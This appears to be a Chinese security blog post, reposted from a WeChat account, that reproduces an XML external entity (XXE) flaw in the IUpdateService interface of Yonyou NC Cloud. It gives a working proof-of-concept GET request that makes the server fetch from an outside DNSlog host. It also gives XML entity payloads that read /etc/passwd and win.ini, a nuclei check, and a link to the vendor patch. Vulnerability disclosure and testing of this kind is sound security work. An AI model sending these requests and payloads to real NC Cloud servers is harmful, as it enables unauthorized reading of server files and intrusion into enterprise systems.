【成功复现】用友NC Cloud系统XML外部实体注入漏洞

admin

102928
文章

87
评论

2024年1月19日16:18:08评论78 views字数 995阅读3分19秒阅读模式

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务，帮助客户实现发展目标，进而推动商业和社会进步。

UClient 提供全新客户端，消除浏览器依赖，完成用户与企业应用的链接优化，并支持企业应用在终端上的自动升级。NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。该系统IUpdateService接口存在实体注入漏洞。

0x02影响版本

用友NC Cloud

0x03漏洞复现

1.访问漏洞环境

【成功复现】用友NC Cloud系统XML外部实体注入漏洞

2.对漏洞进行复现

POC （GET）

漏洞复现

GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://opeokveobk.dgrh3.cn HTTP/1.1Content-Type: application/jsonHost: 127.0.0.1

【成功复现】用友NC Cloud系统XML外部实体注入漏洞

测试DNSlog（漏洞存在）

【成功复现】用友NC Cloud系统XML外部实体注入漏洞

可通过构造xml文件远程加载实现攻击目的

windows:<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>linux:<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]><user><username>&name;</username><password>1</password></user>

3.nuclei工具测试（漏洞存在）

【成功复现】用友NC Cloud系统XML外部实体注入漏洞

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.yonyou.com/https://mp.weixin.qq.com/s/6n5J1hTDkNeReZ4r9REiBg

原文始发于微信公众号（弥天安全实验室）：【成功复现】用友NC Cloud系统XML外部实体注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【成功复现】用友NC Cloud系统XML外部实体注入漏洞

物联网安全篇——Sapido RB-1732路由器命令执行漏洞

【漏洞复现】kkFileView任意文件上传漏洞（QVD-2024-14703）

【漏洞复现】kkFileView任意文件读取漏洞（CVE-2021-43734）

(0day)迅饶科技 X2View物联网设备存在任意用户添加漏洞

世纪信通-LoginForm2-sql注入漏洞复现

用友crm客户关系管理pub/downloadfile.php接口存在任意文件读取漏洞

CVE-2024-33786 中城科信票务管理平台任意文件上传

CVE-2024-1512

CVE-2024-1698

CVE-2024-28253 :OpenMetadata

发表评论

在线咨询

微信